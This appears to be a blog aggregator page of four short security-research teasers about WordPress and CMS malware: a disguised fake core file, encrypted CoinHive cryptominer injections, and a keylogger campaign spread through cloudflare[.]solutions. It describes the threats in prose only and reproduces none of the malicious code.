Categories
Security

Obfuscation Through Legitimate Appearances

Obfuscation Through Legitimate Appearances

Recently, I analyzed a malware sample provided by our analyst Edward C. Woelke and noticed that it had been placed in a core WordPress folder. This seemed suspicious, since no such core WP file like it exists: ./wp-includes/init.php

Deceiving Appearances

I started with a standard analysis and my first thought was, this has to be a legitimate file! Nicely structured, with very legit-looking function names. It even used Object Oriented PHP, which doesn’t happen very often in the case of malware.

Continue reading Obfuscation Through Legitimate Appearances at Sucuri Blog.

Categories
Security

Malicious Website Cryptominers from GitHub. Part 2.

Malicious Website Cryptominers from GitHub. Part 2.

Recently we wrote about how GitHub/GitHub.io was used in attacks that injected cryptocurrency miners into compromised websites. Around the same time, we noticed another attack that also used GitHub for serving malicious code.

Encrypted CoinHive Miner in Header.php

The following encrypted malware was found in the header.php file of the active WordPress theme:

There are four lines of code in total. Each, when decoded, plays a different role.

CoinHive Injections

When decoded, the last two lines inject typical CoinHive cryptocurrency miners:

The miner is only shown conditionally, so bots are excluded and only human visitors will receive it.

Continue reading Malicious Website Cryptominers from GitHub. Part 2. at Sucuri Blog.

Categories
Security

Cloudflare[.]Solutions Keylogger on Thousands of Infected WordPress Sites

Cloudflare[.]Solutions Keylogger on Thousands of Infected WordPress Sites

A few weeks ago, we wrote about a massive WordPress infection that injected an obfuscated script pretending to be jQuery and Google Analytics. In reality, this script loaded a CoinHive cryptocurrency miner from a third-party server.

We also mentioned a post written back in April that described the cloudflare.solutions malware, which came along with the cryptominers. At this moment, PublcWWW reports there are 5,482 sites infected with this malware. It seems that this evolving campaign is now adding keyloggers to the mix.

Continue reading Cloudflare[.]Solutions Keylogger on Thousands of Infected WordPress Sites at Sucuri Blog.

Categories
Security

Cryptominers on Hacked Sites – Part 2

Cryptominers on Hacked Sites – Part 2

Last month we wrote about how the emergence of website cryptocurrency miners resulted in hackers abusing the technology by injecting the CoinHive miners into compromised sites without the consent of the website owners.

We reviewed two types of infections that affected WordPress and Magento sites, and have been monitoring the malicious use of the CoinHive cryptominer. What we are discovering is that there are more and more attacks in the wild using cryptominers, which affects all major CMS platforms.

Continue reading Cryptominers on Hacked Sites – Part 2 at Sucuri Blog.